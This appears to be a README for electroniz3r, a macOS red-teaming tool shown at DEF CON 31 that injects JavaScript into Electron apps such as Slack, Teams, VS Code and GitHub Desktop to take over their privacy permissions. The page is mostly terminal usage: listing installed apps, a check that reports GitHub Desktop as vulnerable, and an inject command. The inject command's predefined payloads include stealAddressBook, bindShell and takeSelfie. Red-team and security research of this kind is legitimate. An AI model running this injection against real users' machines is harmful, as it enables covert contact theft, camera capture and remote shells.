Take over macOS Electron apps' TCC permissions
Take over macOS Electron apps’ TCC permissions with electroniz3r. The tool has been presented for the first time on DEFCON31 in Las Vegas during my ELECTRONizing macOS privacy - a new weapon in your red teaming armory
$ electroniz3r
OVERVIEW: macOS Red Teaming tool that allows code injection in Electron apps
by Wojciech Reguła (@_r3ggi)
USAGE: electroniz3r <subcommand>
-h, --help Show help information.
list-apps List all installed Electron apps
inject Inject code to a vulnerable Electron app
verify Verify if an Electron app is vulnerable to code injection
See 'electroniz3r help <subcommand>' for detailed help.
$ electroniz3r list-apps
║ Bundle identifier │ Path ║
com.microsoft.VSCode /Applications/Visual Studio Code.app
com.vmware.fusionApplicationsMenu /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app
notion.id /Applications/Notion.app
com.github.GitHubClient /Applications/GitHub Desktop.app
com.logi.optionsplus /Applications/logioptionsplus.app
com.microsoft.teams /Applications/Microsoft Teams.app
com.tinyspeck.slackmacgap /Applications/Slack.app
$ electroniz3r verify "/Applications/GitHub Desktop.app"
/Applications/GitHub Desktop.app started the debug WebSocket server
The application is vulnerable!
You can now kill the app using `kill -9 7033`
$ electroniz3r help inject
OVERVIEW: Inject code to a vulnerable Electron app
USAGE: electroniz3r inject <path> [--path-js <path-js>] [--predefined-script <predefined-script>]
<path> Path to the Electron app
--path-js <path-js> Path to a file containing JavaScript code to be executed
--predefined-script <predefined-script>
Use predefined JS scripts (calc, screenshot, stealAddressBook, bindShell, takeSelfie)
-h, --help Show help information.